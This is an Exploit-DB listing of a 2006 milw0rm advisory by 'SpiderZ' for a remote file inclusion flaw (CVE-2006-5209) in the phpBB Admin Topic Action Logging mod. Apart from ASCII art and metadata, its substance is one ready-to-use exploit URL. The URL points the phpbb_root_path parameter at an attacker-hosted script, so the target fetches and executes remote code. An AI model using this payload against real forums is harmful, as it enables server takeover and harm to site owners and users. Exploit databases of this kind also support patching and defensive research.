phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln

2006-10-04T00:00:00
ID EDB-ID:2475
Type exploitdb
Reporter SpiderZ
Modified 2006-10-04T00:00:00

Description

phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln. CVE-2006-5209. Webapps exploit for php platform

                                        
                                                       /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  &gt;&lt;  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Admin Topic Action Logging Remote File Inclusion Vulnerability
# Version 0.95 Admin Topic Action Logging
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________




http://site.com/[path]/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://[Evil_script]




-------------------------------------------------------------------------------------
# Download: http://www.nivisec.com/downloads/phpbb/admin_topic_action_logging_beta.zip
# File: 38 KB
-------------------------------------------------------------------------------------

# milw0rm.com [2006-10-04]